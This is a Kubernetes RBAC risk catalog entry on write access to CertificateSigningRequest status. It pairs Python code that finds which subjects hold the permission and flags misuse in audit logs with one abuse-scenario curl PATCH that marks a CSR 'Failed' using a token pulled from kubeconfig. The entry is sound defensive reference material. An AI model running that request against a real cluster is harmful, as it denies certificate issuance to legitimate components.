Update CertificateSigningRequest Status (Tampering/DoS)
Tampering
Medium
Overview
| Field | Value |
|---|---|
| ID | 1090 |
| Name | Update CertificateSigningRequest Status (Tampering/DoS) |
| Risk Category | Tampering |
| Risk Level | Medium |
| Role Type | ClusterRole |
| API Groups | certificates.k8s.io |
| Resources | certificatesigningrequests/status |
| Verbs | update, patch |
| Tags | CertificateManagement DenialOfService Tampering |
Description
Allows updating the status subresource of CertificateSigningRequests (CSRs). This is the subresource the signer writes to, and it carries the signer's output: the status.certificate field and the 'Failed' condition. It does not carry approval. The API server accepts the 'Approved' and 'Denied' conditions only through the separate approval subresource (certificatesigningrequests/approval) and rejects a status update that tries to add or remove either, so this permission cannot bypass an approval workflow and does not grant approval. It can still be abused in two ways. Adding a 'Failed' condition to a pending or approved CSR makes requesters that wait on it, such as the kubelet's certificate client, treat issuance as failed and keeps the built-in signer from issuing for it, a denial of service against certificate issuance. Writing status.certificate before the signer does plants a certificate the cluster signer never produced on the request, which the requester consumes once the CSR is approved. Outside the signer components (the csrsigning controller in kube-controller-manager, or an external signer) nothing legitimate needs this permission, so any other holder warrants scrutiny.
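The check a practitioner wants for this entry is which subjects actually hold update or patch on certificatesigningrequests/status. The following is an added example, not code from the catalog or from Kubernetes: it re-implements the RBAC rule matching the authorizer applies (a verb, group or resource of `*` matches anything, resources match as `resource/subresource`, and `*/status` matches the status subresource of any resource) and resolves matching ClusterRoles through ClusterRoleBindings to subjects. Only ClusterRoleBindings are considered because CSRs are cluster-scoped, so a RoleBinding cannot grant them. The ClusterRole and ClusterRoleBinding objects embedded below are constructed for the example (the certificate-controller role is modelled on the built-in one, not copied from it); on a real cluster feed it the output of `kubectl get clusterroles -o json` and `kubectl get clusterrolebindings -o json`.

```python
"""Find subjects that can write certificatesigningrequests/status.

Added example for the catalog entry; the sample objects are constructed.
"""
import json
import sys

API_GROUP = "certificates.k8s.io"
RESOURCE = "certificatesigningrequests"
SUBRESOURCE = "status"
WRITE_VERBS = ("patch", "update")


def rule_matches(rule: dict, api_group: str, resource: str, subresource: str, verb: str) -> bool:
    """Mirror the RBAC authorizer's matching for one PolicyRule.

    '*' in apiGroups/verbs/resources matches everything; a resource entry
    matches exactly against 'resource/subresource'; '*/<subresource>'
    matches that subresource on any resource. A rule naming only the bare
    resource does NOT cover its subresources.
    """
    groups = rule.get("apiGroups", [])
    verbs = rule.get("verbs", [])
    if "*" not in groups and api_group not in groups:
        return False
    if "*" not in verbs and verb not in verbs:
        return False
    combined = f"{resource}/{subresource}" if subresource else resource
    for r in rule.get("resources", []):
        if r == "*" or r == combined:
            return True
        if subresource and r == f"*/{subresource}":
            return True
    return False


def role_grants_status_write(role: dict) -> set:
    """Write verbs a ClusterRole grants on certificatesigningrequests/status.

    Aggregated ClusterRoles are fine: the API server materialises the
    aggregated rules into .rules, which is what kubectl returns.
    """
    granted = set()
    for rule in role.get("rules", []):
        for verb in WRITE_VERBS:
            if rule_matches(rule, API_GROUP, RESOURCE, SUBRESOURCE, verb):
                granted.add(verb)
    return granted


def subjects_with_csr_status_write(cluster_roles: list, cluster_role_bindings: list) -> list:
    """Resolve risky ClusterRoles to subjects via ClusterRoleBindings.

    Returns sorted (subject kind, subject name, ClusterRole, verbs) tuples.
    CSRs are cluster-scoped, so RoleBindings are irrelevant and not read.
    """
    risky = {r["metadata"]["name"]: sorted(role_grants_status_write(r)) for r in cluster_roles}
    risky = {name: verbs for name, verbs in risky.items() if verbs}
    findings = []
    for crb in cluster_role_bindings:
        ref = crb.get("roleRef", {})
        if ref.get("kind") != "ClusterRole" or ref.get("name") not in risky:
            continue
        for subj in crb.get("subjects", []):
            name = subj["name"]
            if subj.get("kind") == "ServiceAccount":  # qualify SAs with their namespace
                name = f"{subj.get('namespace', '')}:{name}"
            findings.append((subj["kind"], name, ref["name"], risky[ref["name"]]))
    return sorted(findings)


# Constructed sample objects (assumption: shaped like kubectl -o json items).
SAMPLE_CLUSTER_ROLES = [
    {"metadata": {"name": "system:controller:certificate-controller"},
     "rules": [
         {"apiGroups": [API_GROUP], "resources": [RESOURCE], "verbs": ["get", "list", "watch", "delete"]},
         {"apiGroups": [API_GROUP], "resources": [f"{RESOURCE}/approval", f"{RESOURCE}/status"], "verbs": ["update"]},
     ]},
    # Over-broad "status patcher": */status across all groups silently includes CSR status.
    {"metadata": {"name": "status-patcher"},
     "rules": [{"apiGroups": ["*"], "resources": ["*/status"], "verbs": ["patch"]}]},
    {"metadata": {"name": "csr-reader"},
     "rules": [{"apiGroups": [API_GROUP], "resources": [RESOURCE], "verbs": ["get", "list", "watch"]}]},
]
SAMPLE_BINDINGS = [
    {"metadata": {"name": "system:controller:certificate-controller"},
     "roleRef": {"kind": "ClusterRole", "name": "system:controller:certificate-controller"},
     "subjects": [{"kind": "ServiceAccount", "name": "certificate-controller", "namespace": "kube-system"}]},
    {"metadata": {"name": "dev-status-patcher"},
     "roleRef": {"kind": "ClusterRole", "name": "status-patcher"},
     "subjects": [{"kind": "User", "name": "dev-alice"}, {"kind": "Group", "name": "ci-bots"}]},
    {"metadata": {"name": "viewers"},
     "roleRef": {"kind": "ClusterRole", "name": "csr-reader"},
     "subjects": [{"kind": "Group", "name": "viewers"}]},
]

if __name__ == "__main__":
    if len(sys.argv) == 3:  # roles.json crbs.json from kubectl get ... -o json
        with open(sys.argv[1]) as f:
            roles = json.load(f)["items"]
        with open(sys.argv[2]) as f:
            crbs = json.load(f)["items"]
    else:
        roles, crbs = SAMPLE_CLUSTER_ROLES, SAMPLE_BINDINGS
    for kind, name, role, verbs in subjects_with_csr_status_write(roles, crbs):
        print(f"{kind} {name} via ClusterRole {role}: {','.join(verbs)}")
```

On the constructed input the script reports the certificate-controller service account (expected, it is the signer) plus the user and group bound to the `*/status` role, which is the kind of over-broad grant this entry is about; the read-only role is not reported.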
Abuse Scenarios
- Patch a CertificateSigningRequest status to add a 'Failed' condition, which blocks legitimate issuance. The status subresource rejects 'Approved' and 'Denied' conditions; those require update or patch on certificatesigningrequests/approval instead.

```bash
# Replace <kubernetes-api-server> with your API server address
# Replace <token> with your authentication token
# A PATCH must carry a patch media type; plain application/json is refused with 415.
# Strategic merge patch merges the conditions list by "type", so an existing
# Approved condition is kept (a merge patch would replace the whole list, and
# removing Approved via /status is rejected). Failed must have status "True".
curl -k -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/strategic-merge-patch+json" -X PATCH \
  --data '{"status":{"conditions":[{"type":"Failed","status":"True","reason":"SignerFailure","message":"Failed by attacker"}]}}' \
  https://<kubernetes-api-server>/apis/certificates.k8s.io/v1/certificatesigningrequests/<csr-name>/status

# Example: curl -k -H "Authorization: Bearer $(grep token: ~/.kube/config | awk '{print $2}')" -H "Content-Type: application/strategic-merge-patch+json" -X PATCH --data '{"status":{"conditions":[{"type":"Failed","status":"True","reason":"SignerFailure","message":"Failed by attacker"}]}}' https://127.0.0.1:6443/apis/certificates.k8s.io/v1/certificatesigningrequests/my-app-csr/status
```
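The request above leaves a clear trace in the API server audit log, and the detection a practitioner would pair with this entry is "a write to certificatesigningrequests/status by anything other than the signer". The following is an added example, not code from the catalog: it runs that rule over audit events in JSON-lines form, counts only the ResponseComplete stage so each request is seen once, separates successful writes from rejected attempts by response code, and extracts the condition types from requestObject when the audit policy logs request bodies (at Metadata level that field is absent and the list comes back empty). The allow-list of signer identities and the audit lines themselves are constructed for the example; the controller manager's username depends on whether it runs with `--use-service-account-credentials`, and an external signer would need adding.

```python
"""Flag CSR status writes by non-signer principals in Kubernetes audit logs.

Added example for the catalog entry; the audit events are constructed.
"""
import json

# Assumption: the built-in signer authenticates as one of these, depending on
# controller-manager configuration. Add your external signer's identity here.
DEFAULT_ALLOWED_USERS = frozenset({
    "system:kube-controller-manager",
    "system:serviceaccount:kube-system:certificate-controller",
})


def parse_events(lines):
    """Yield parsed audit events, skipping blank or non-JSON lines."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def is_csr_status_write(ev: dict) -> bool:
    """True for a completed update/patch to certificatesigningrequests/status."""
    ref = ev.get("objectRef") or {}
    return (ev.get("stage") == "ResponseComplete"
            and ev.get("verb") in ("update", "patch")
            and ref.get("apiGroup") == "certificates.k8s.io"
            and ref.get("resource") == "certificatesigningrequests"
            and ref.get("subresource") == "status")


def condition_types(ev: dict) -> list:
    """Condition types carried in the request body, if the policy logged it."""
    obj = ev.get("requestObject") or {}
    conds = (obj.get("status") or {}).get("conditions") or []
    return sorted({c.get("type") for c in conds if c.get("type")})


def find_suspicious_csr_status_writes(lines, allowed_users=DEFAULT_ALLOWED_USERS) -> list:
    """Return one finding per CSR status write from a principal not in allowed_users."""
    findings = []
    for ev in parse_events(lines):
        if not is_csr_status_write(ev):
            continue
        user = (ev.get("user") or {}).get("username", "")
        if user in allowed_users:
            continue
        code = (ev.get("responseStatus") or {}).get("code", 0)
        findings.append({
            "user": user,
            "verb": ev.get("verb"),
            "csr": (ev.get("objectRef") or {}).get("name"),
            "code": code,
            "succeeded": 200 <= code < 300,   # 422 means validation refused it
            "conditions": condition_types(ev),
        })
    return findings


def _event(stage, verb, user, name, code, subresource="status", resource="certificatesigningrequests",
           group="certificates.k8s.io", body=None):
    ev = {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": stage, "verb": verb,
          "user": {"username": user},
          "objectRef": {"apiGroup": group, "apiVersion": "v1", "resource": resource,
                        "subresource": subresource, "name": name},
          "responseStatus": {"code": code}}
    if body is not None:
        ev["requestObject"] = body
    return json.dumps(ev)


# Constructed sample log: legitimate signer write, an attacker's request seen at
# both stages, a rejected attempt to set Denied, unrelated noise and a junk line.
SAMPLE_AUDIT_LINES = [
    _event("ResponseComplete", "update", "system:kube-controller-manager", "my-app-csr", 200),
    _event("RequestReceived", "patch", "system:serviceaccount:dev:ci-bot", "my-app-csr", 0),
    _event("ResponseComplete", "patch", "system:serviceaccount:dev:ci-bot", "my-app-csr", 200,
           body={"status": {"conditions": [{"type": "Failed", "status": "True", "reason": "SignerFailure"}]}}),
    _event("ResponseComplete", "patch", "system:serviceaccount:dev:ci-bot", "node-csr-abc", 422,
           body={"status": {"conditions": [{"type": "Denied", "status": "True", "reason": "ManualDenial"}]}}),
    _event("ResponseComplete", "patch", "system:node:worker-1", "worker-1", 200, resource="nodes", group=""),
    _event("ResponseComplete", "get", "system:serviceaccount:dev:ci-bot", "my-app-csr", 200),
    "this line is not JSON",
]

if __name__ == "__main__":
    for f in find_suspicious_csr_status_writes(SAMPLE_AUDIT_LINES):
        state = "SUCCEEDED" if f["succeeded"] else f"REJECTED ({f['code']})"
        print(f"{f['user']} {f['verb']} csr/{f['csr']}/status {state} conditions={f['conditions']}")
```

Both of the ci-bot events are reported: the successful Failed write is the denial of service described above, and the 422 on the Denied attempt is the API server refusing an approval condition on the status subresource, which is still worth an alert because it shows a principal probing the permission.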